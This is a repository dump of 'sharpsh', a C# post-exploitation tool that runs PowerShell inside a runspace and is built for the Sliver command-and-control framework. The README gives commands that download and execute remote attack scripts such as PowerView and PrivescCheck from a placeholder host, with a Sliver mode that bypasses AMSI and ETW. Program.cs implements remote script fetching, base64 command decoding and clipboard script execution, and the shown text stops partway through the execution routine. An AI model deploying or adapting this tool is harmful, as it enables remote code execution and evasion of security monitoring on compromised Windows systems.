├── .gitignore
├── README.md
├── sharpsh.sln
└── sharpsh
├── App.config
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── packages.config
└── sharpsh.csproj
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.tlog
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio 6 auto-generated project file (contains which files were open etc.)
298 | *.vbp
299 |
300 | # Visual Studio 6 workspace and project file (working project files containing files to include in project)
301 | *.dsw
302 | *.dsp
303 |
304 | # Visual Studio 6 technical files
305 | *.ncb
306 | *.aps
307 |
308 | # Visual Studio LightSwitch build output
309 | **/*.HTMLClient/GeneratedArtifacts
310 | **/*.DesktopClient/GeneratedArtifacts
311 | **/*.DesktopClient/ModelManifest.xml
312 | **/*.Server/GeneratedArtifacts
313 | **/*.Server/ModelManifest.xml
314 | _Pvt_Extensions
315 |
316 | # Paket dependency manager
317 | .paket/paket.exe
318 | paket-files/
319 |
320 | # FAKE - F# Make
321 | .fake/
322 |
323 | # CodeRush personal settings
324 | .cr/personal
325 |
326 | # Python Tools for Visual Studio (PTVS)
327 | __pycache__/
328 | *.pyc
329 |
330 | # Cake - Uncomment if you are using it
331 | # tools/**
332 | # !tools/packages.config
333 |
334 | # Tabs Studio
335 | *.tss
336 |
337 | # Telerik's JustMock configuration file
338 | *.jmconfig
339 |
340 | # BizTalk build output
341 | *.btp.cs
342 | *.btm.cs
343 | *.odx.cs
344 | *.xsd.cs
345 |
346 | # OpenCover UI analysis results
347 | OpenCover/
348 |
349 | # Azure Stream Analytics local run output
350 | ASALocalRun/
351 |
352 | # MSBuild Binary and Structured Log
353 | *.binlog
354 |
355 | # NVidia Nsight GPU debugger configuration file
356 | *.nvuser
357 |
358 | # MFractors (Xamarin productivity tool) working folder
359 | .mfractor/
360 |
361 | # Local History for Visual Studio
362 | .localhistory/
363 |
364 | # Visual Studio History (VSHistory) files
365 | .vshistory/
366 |
367 | # BeatPulse healthcheck temp database
368 | healthchecksdb
369 |
370 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
371 | MigrationBackup/
372 |
373 | # Ionide (cross platform F# VS Code tools) working folder
374 | .ionide/
375 |
376 | # Fody - auto-generated XML schema
377 | FodyWeavers.xsd
378 |
379 | # VS Code files for those working on multiple tools
380 | .vscode/*
381 | !.vscode/settings.json
382 | !.vscode/tasks.json
383 | !.vscode/launch.json
384 | !.vscode/extensions.json
385 | *.code-workspace
386 |
387 | # Local History for Visual Studio Code
388 | .history/
389 |
390 | # Windows Installer files from build outputs
391 | *.cab
392 | *.msi
393 | *.msix
394 | *.msm
395 | *.msp
396 |
397 | # JetBrains Rider
398 | *.sln.iml
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # sharpsh
2 | C# .Net Framework program that uses `RunspaceFactory` for Powershell command execution. Built for use with `execute-assembly -E -M -i ...` in [BishopFox/Sliver](https://github.com/bishopfox/sliver).
3 |
4 | ## Features
5 | - Execute Powershell commands
6 | - Load & execute remote script
7 | - Multiple command & script support
8 | - Encoded command support
9 | - Load & execute script from clipboard
10 |
11 | ## Usage
12 |
13 | ```
14 | sharpsh 1.0.0.0
15 | Copyright c 2022
16 |
17 | -c, --cmd Required. Powershell command to run
18 |
19 | -u, --uri Fetch script from URI
20 |
21 | -p, --clipboard Fetch script from clipboard
22 |
23 | -e, --encoded Encodeded command (base64)
24 |
25 | --help Display this help screen.
26 |
27 | --version Display version information.
28 | ```
29 |
30 | ## Examples
31 |
32 | ```
33 | # execute powershell command
34 | PS > .\sharpsh.exe -c whoami
35 |
36 | # execute base64 encoded powershell command
37 | PS > .\sharpsh.exe -e -c d2hvYW1pCg==
38 |
39 | # load script from clipboard and execute command
40 | PS > .\sharpsh.exe -p -c Get-NetLocalGroup
41 |
42 | # load remote script and execute
43 | PS > .\sharpsh.exe -u http://x.x.x.x/PowerView.ps1 -c get-netlocalgroup
44 |
45 | # load remote script and execute encoded command
46 | PS > .\sharpsh.exe -u http://x.x.x.x/PowerView.ps1 -e -c R2V0LU5ldExvY2FsR3JvdXAK
47 |
48 | # execute multiple powershell commands
49 | PS > .\sharpsh.exe -c hostname,whoami
50 |
51 | # execute multiple powershell commands using multiple scripts
52 | PS > .\sharpsh.exe -c get-netlocalgroup,invoke-privesccheck -u http://x.x.x.x/PowerView.ps1,http://x.x.x.x/PrivescCheck.ps1 -b
53 |
54 | # sliver inline & bypass AMSI + ETW
55 | sliver > execute-assembly -M -E -i /tools/sharpsh.exe -c get-netlocalgroup -u http://x.x.x.x/psh/PowerSploit/Recon/PowerView.ps1
56 | ```
57 |
58 | ## Planned
59 | - Load & execute embedded script
60 | - Load & execute script from disk
61 | - Compression & encryption support for scripts
62 |
63 |
64 | ## Build
65 | Built using .NET Framework v4.5.1 in Visual Studio 2019.
66 |
67 | Be sure to add `c:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll` as a reference.
68 |
69 | The project uses [`dnMerge`](https://github.com/CCob/dnMerge) so it has to be compiled in `Release` mode.
--------------------------------------------------------------------------------
/sharpsh.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32413.511
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sharpsh", "sharpsh\sharpsh.csproj", "{3464B3AA-672A-4DE8-88C0-75D86FB97467}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {3464B3AA-672A-4DE8-88C0-75D86FB97467}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {3464B3AA-672A-4DE8-88C0-75D86FB97467}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {3464B3AA-672A-4DE8-88C0-75D86FB97467}.Debug|x64.ActiveCfg = Debug|x64
19 | {3464B3AA-672A-4DE8-88C0-75D86FB97467}.Debug|x64.Build.0 = Debug|x64
20 | {3464B3AA-672A-4DE8-88C0-75D86FB97467}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {3464B3AA-672A-4DE8-88C0-75D86FB97467}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {3464B3AA-672A-4DE8-88C0-75D86FB97467}.Release|x64.ActiveCfg = Release|x64
23 | {3464B3AA-672A-4DE8-88C0-75D86FB97467}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {4A364B6D-8841-40FB-B7A9-7C5846F41B8E}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/sharpsh/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/sharpsh/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Management.Automation;
5 | using System.Management.Automation.Runspaces;
6 | using System.Net;
7 | using System.Text;
8 | using System.Windows;
9 | using CommandLine;
10 |
11 | // need to add as reference:
12 | // c:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
13 |
14 | namespace sharpsh
15 | {
16 | class Program
17 | {
18 | class Options
19 | {
20 | [Option('c', "cmd", Required = true, Separator = ',', HelpText = "Powershell command to run")]
21 | public IEnumerable inputCmds { get; set; }
22 | [Option('u', "uri", Required = false, Separator = ',', HelpText = "Fetch script from URI")]
23 | public IEnumerable inputUri { get; set; }
24 | [Option('p', "clipboard", Required = false, HelpText = "Fetch script from clipboard")]
25 | public bool clipboard { get; set; }
26 | // disabling as intended use is with execute-assembly -i -M -E
27 | //[Option('b', "bypass-amsi", Required = false, HelpText = "Bypass AMSI")]
28 | //public bool bypassAmsi { get; set; }
29 | [Option('e', "encoded", Required = false, HelpText = "Encodeded command (base64)")]
30 | public bool encodedCmd { get; set; }
31 | }
32 | [STAThread]
33 | static void Main(string[] args)
34 | {
35 | Parser.Default.ParseArguments(args).WithParsed(o =>
36 | {
37 | IEnumerable inputCmds = o.inputCmds;
38 | IEnumerable inputURIs = o.inputUri;
39 | //bool bypassAmsi = o.bypassAmsi;
40 | bool encodedCmd = o.encodedCmd;
41 | bool clipboard = o.clipboard;
42 | List cmds = new List();
43 | string clipboardText = "";
44 |
45 | // bypass amsi
46 | /*
47 | if (bypassAmsi)
48 | {
49 | // using powershell to avoid p/d invoke
50 | cmds.Add("echo 'enter your bypass here'");
51 | }
52 | */
53 |
54 | // fetch remote script and execute
55 | foreach (string inputURI in inputURIs)
56 | {
57 | string aCmd = FetchURI(inputURI);
58 | if (aCmd == null)
59 | {
60 | Console.WriteLine("[!] Error requesting " + inputURI);
61 | return;
62 | }
63 | cmds.Add(aCmd);
64 | }
65 |
66 | // read in clipboard sript
67 | if (clipboard)
68 | {
69 | clipboardText = System.Windows.Clipboard.GetText(TextDataFormat.Text);
70 | cmds.Add(clipboardText);
71 | }
72 |
73 | // add input commands
74 | foreach (string cmd in inputCmds)
75 | {
76 | if (encodedCmd)
77 | {
78 | byte[] d = Convert.FromBase64String(cmd);
79 | string n = Encoding.ASCII.GetString(d);
80 | // trim null terminators
81 | n = n.Replace("\0", string.Empty);
82 | cmds.Add(n);
83 | }
84 | else
85 | {
86 | cmds.Add(cmd);
87 | }
88 | }
89 |
90 | ExecutePwsh(cmds);
91 | });
92 |
93 | return;
94 | }
95 | public static void ExecutePwsh(List cmds)
96 | {
97 | Runspace rs = RunspaceFactory.CreateRunspace();
98 | rs.Open();
99 |
100 | // instantiate a PowerShell object
101 | PowerShell ps = PowerShell.Create();
102 | ps.Runspace = rs;
103 |
104 | foreach (string cmd in cmds)
105 | {
106 | if (String.IsNullOrWhiteSpace(cmd))
107 | {
108 | Console.WriteLine("error: command string not supplied");
109 | break;
110 | }
111 | ps.AddScript(cmd);
112 | ps.AddCommand("Out-String");
113 | PSDataCollection